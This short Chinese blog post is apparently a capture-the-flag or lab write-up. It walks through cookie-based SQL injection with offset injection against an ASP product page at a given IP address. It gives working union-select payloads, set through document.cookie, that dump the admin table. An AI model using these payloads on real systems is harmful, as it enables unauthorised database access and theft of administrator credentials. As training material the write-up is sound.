进入产品中心
就这样子
利用cookie注入所学 测试字段 实测字段为26
在控制台进行偏移注入:
然后再另外一个页面访问:http://59.63.200.79:8004/ProductShow.asp
可以看到,select语句中的25 显示在了图片img标签的src属性值中:
可以看到突破口在25字段
然后poc语句
alert(document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,admin.*,26"))
进行多次偏移注入后
得到以下语句
alert(document.cookie="id="+escape("105 union select 1,2,3,4,5,6,7,8,9,admin.*,26 from admin"))
刷新 http://59.63.200.79:8004/ProductShow.asp页面
在img src中 得到Flag
打赏我,让我更有动力~
© 2016 - 2023 掌控者 All Rights Reserved.
holic
发表于 2019-11-8
你是不是写错地方了
评论列表
加载数据中...